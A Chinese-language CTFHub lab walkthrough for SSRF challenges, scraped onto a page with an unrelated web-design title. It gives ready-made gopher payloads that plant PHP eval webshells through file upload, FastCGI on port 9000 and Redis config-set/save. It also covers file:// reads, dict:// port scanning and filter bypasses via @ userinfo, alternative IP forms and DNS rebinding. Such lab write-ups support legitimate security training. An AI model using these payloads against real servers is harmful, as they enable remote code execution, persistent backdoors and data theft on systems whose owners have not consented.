当前位置：首页 > news >正文

上海信息公司做网站wordpress的菜单和页面

news 2025/11/13 19:38:30

上海信息公司做网站,wordpress的菜单和页面,物流公司做网站注重什么,最新军事头条文章目录 CTFHub SSRF 通关教程1. 内网访问#xff0c;伪协议利用1.1 内网访问1.2 伪协议读取文件1.3 端口扫描 2. POST请求#xff0c;上传文件#xff0c;FastCGI协议#xff0c;Redis协议2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议 3. Bypass系列3.1 URL By… 文章目录 CTFHub SSRF 通关教程1. 内网访问伪协议利用1.1 内网访问1.2 伪协议读取文件1.3 端口扫描 2. POST请求上传文件FastCGI协议Redis协议2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议 3. Bypass系列3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass CTFHub SSRF 通关教程 1. 内网访问伪协议利用 1.1 内网访问用burpsuite抓取数据包发送到Repeater模块将url修改为下面这个内容即可 ?url127.0.0.1/flag.phpctfhub{0f27868bd5983f24f5ce02c9}1.2 伪协议读取文件常见的伪协议 file:/// 本地文件传输协议主要用于访问本地计算机中的文件。在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。 dict:// 字典服务器协议dict是基于查询相应的TCP协议。 sftp:// SH文件传输协议或安全文件传输协议Secure File Transfer Protocol是一种简单的基于lockstep机制的文件传输协议允许客户端从远程主机获取文件或将文件上传至远程主机。 ldap:// 代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。 tftp:// 基于lockstep机制的文件传输协议允许客户端从远程主机获取文件或将文件上传至远程主机。 gopher:// 是一种分布式文档传递服务。利用该服务用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。用burpsuite抓取数据包发送到Repeater模块将url修改为下面这个内容即可 /?urlfile:///var/www/html/flag.phpctfhub{d64815f878477afcd7c92c0a}1.3 端口扫描题目提醒端口在8000-9000之间。使用bp爆破使用dict://探测开放的端口 ?urldict://127.0.0.1:§666§爆破成功发现端口是8902 访问得到flag ctfhub{6f042e2013b8c8ac3d92d670}2. POST请求上传文件FastCGI协议Redis协议 2.1 POST请求题目提示这次是发一个HTTP POST请求。ssrf是用php的curl实现的。并且会跟踪302跳转准备了一个302.php。查看源码 /?urlvar/www/html/index.php查看flag.php文件 /?urlvar/www/html/flag.php访问127.0.0.1 key253ac935e6c6003864751ad695c8145c拿到KEY这个题目因该就是告诉我需要给服务器发送一个KEY就能得到你想要的东西。但是页面上又什么都没有这就需要我们构建一个POST请求包来发送这个KEY。 POST /flag.php HTTP/1.1 Host: 127.0.0.1:80 Content-Length: 36 Content-Type: application/x-www-form-urlencodedkey253ac935e6c6003864751ad695c8145c第一次编码 gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Length%3A%2036%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0Akey%3D253ac935e6c6003864751ad695c8145c说明gopher协议可以在URL中提交POST参数。最后一次编码 gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253D253ac935e6c6003864751ad695c8145c构造访问拼接在url后 ctfhub{3d11698a888f440ada017ee3}2.2 上传文件提示这次需要上传一个文件到flag.php了.祝你好运内网访问flag.php发现是个文件上传但是只有浏览框没有提交框。 input typesubmit namefile修改前端代码。修改后效果如下然后随便上传一个文件bp进行抓包将抓取的数据包全部复制创建一个python脚本1.py然后将复制的内容粘贴到下面文件的payload中通过脚本对请求包进行编码。 import urllib.parse payload \ POST /flag.php HTTP/1.1 Host: challenge-52a38570217269be.sandbox.ctfhub.com:10800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary---------------------------315882083476278763087340318 Content-Length: 375 Origin: http://challenge-52a38570217269be.sandbox.ctfhub.com:10800 Connection: close Referer: http://challenge-52a38570217269be.sandbox.ctfhub.com:10800/?url127.0.0.1/flag.php Upgrade-Insecure-Requests: 1-----------------------------315882083476278763087340318 Content-Disposition: form-data; namefile; filename1.php Content-Type: application/octet-stream?php eval($_REQUEST[777])?-----------------------------315882083476278763087340318 Content-Disposition: form-data; namefile提交查询 -----------------------------315882083476278763087340318--#注意后面一定要有回车回车结尾表示http请求结束 tmp urllib.parse.quote(payload) new tmp.replace(%0A,%0D%0A) result gopher://127.0.0.1:80/_new result urllib.parse.quote(result) print(result) # 这里因为是GET请求所以要进行两次url编码编码成功后显示效果如下 gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-52a38570217269be.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A109.0%2529%2520Gecko/20100101%2520Firefox/117.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------315882083476278763087340318%250D%250AContent-Length%253A%2520375%250D%250AOrigin%253A%2520http%253A//challenge-52a38570217269be.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-52a38570217269be.sandbox.ctfhub.com%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------315882083476278763087340318%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_REQUEST%255B777%255D%2529%253F%253E%250D%250A%250D%250A-----------------------------315882083476278763087340318%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%25E6%259F%25A5%25E8%25AF%25A2%250D%250A-----------------------------315882083476278763087340318--%250D%250A%250D%250A最后将生成的编码拼接到url后发包即可。 ctfhub{b4654348ac2636aeaaecd806}2.3 FastCGI协议 Gopherus工具https://github.com/tarunkant/Gopherus.git Gopherus 是一款用于发现和利用 Gopher 协议的安全评估工具。Gopher 是一种基于文本的网络协议早在万维网World Wide Web出现之前就存在。Gopherus 工具允许安全研究人员、渗透测试人员和系统管理员使用 Gopher 协议来搜索、浏览和利用 Gopher 服务器上的资源。如果端口9000是开放的则SSRF漏洞可能存在并且可能导致RCE。为了利用它您需要提供一个目标主机上必须存在的文件名。该网站上存在index.php其路径为/var/www/html/index.php ?phperror_reporting(0);if (!isset($_REQUEST[url])) {header(Location: /?url_);exit; }$ch curl_init(); curl_setopt($ch, CURLOPT_URL, $_REQUEST[url]); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_exec($ch); curl_close($ch); 构造要执行的终端命令对一句话木马进行base64编码并写入到名为shell.php的文件中。 echo PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8Cg | base64 -d shell.php使用Gopherus工具生成payload 生成的编码如下 gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH127%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%7F%04%00%3C%3Fphp%20system%28%27echo%20%E2%80%9CPD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8%2BCg%3D%3D%E2%80%9D%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00将生成的payload进行URL编码。 gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH127%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%257F%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520%25E2%2580%259CPD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8%252BCg%253D%253D%25E2%2580%259D%2520%257C%2520base64%2520-d%2520%253E%2520shell.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500然后在浏览器中输入如下路径 http://challenge-f6148759cf815fa1.sandbox.ctfhub.com:10800?urlgopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH127%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%257F%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520%25E2%2580%259CPD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8%252BCg%253D%253D%25E2%2580%259D%2520%257C%2520base64%2520-d%2520%253E%2520shell.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500蚁剑进行连接查找flag ctfhub{cc096ee41c566d7280067233}2.4 Redis协议 redis命令如下 flushall set 1 ?php eval($_GET[feng]);? config set dir /var/www/html config set dbfilename feng.php savegopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22feng%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A二次编码 gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522feng%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Afeng.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A执行过之后就写入了feng.php ctfhub{d038d02bda2f613a53c11d0b}3. Bypass系列 3.1 URL Bypass 提示请求的URL中必须包含http://notfound.ctfhub.com。尝试用http能不能访问127.0.0.1/flag.php结果如下构造一个地址http://notfound.ctfhub.com127.0.0.1/flag.php 这里的是主域名解析即符号后面直接跟域名符号前面的内容会被视为用户名相当于以http://notfound.ctfhub.com的用户名访问127.0.0.1/flag.php用户名不重要后面才是解析的地址 ctfhub{9db1dac47729d514cc144285}3.2 数字IP Bypass 使用bp抓包查看源码这里显示IP为127172.都被ban了试一下直接访问urlhttp://127.0.0.1/flag.php效果如下尝试采用各种进制绕过十六进制十进制或者采用localhost ctfhub{8f904bada115a76336f60a02}3.3 302跳转 Bypass 302跳转就是由一个URL跳转到另外一个URL当中去查看flag.php文件是否存在这里通过127.0.0.1访问发现该IP无法访问采用127.0.0.1的变形写法 0.0.0.0 获取成功 ctfhub{b875e28c53abd21d077ae32d}读取index.php的源码猜测linux中的文件路径为/var/www/html/index.php。同时看到了在IP位置如果出现了12717210192开头的直接封禁。 3.4 DNS重绑定 Bypass DNS重绑定DNS Rebinding攻击在网页浏览过程中用户在地址栏中输入包含域名的网址。浏览器通过DNS服务器将域名解析为IP地址然后向对应的IP地址请求资源最后展现给用户。而对于域名所有者他可以设置域名所对应的IP地址。当用户第一次访问解析域名获取一个IP地址然后域名持有者修改对应的IP地址用户再次请求该域名就会获取一个新的IP地址。对于浏览器来说整个过程访问的都是同一域名所以认为是安全的。这就造成了DNS Rebinding攻击。使用DNS重绑定从DNS域名解析入手有一个想法就是通过修改域名对应的IP使一个域名对应两个IP那么在多次的访问之下产生的访问效果是一样的实现IP绕过。访问页面并且使用burpsuite抓取数据包。 rbndr.us dns rebinding service (cmpxchg8b.com) 将对应的域名拷贝到URL后即可 ctfhub{6bf68f804e086192d449bc15}

查看全文

http://www.pierceye.com/news/233379/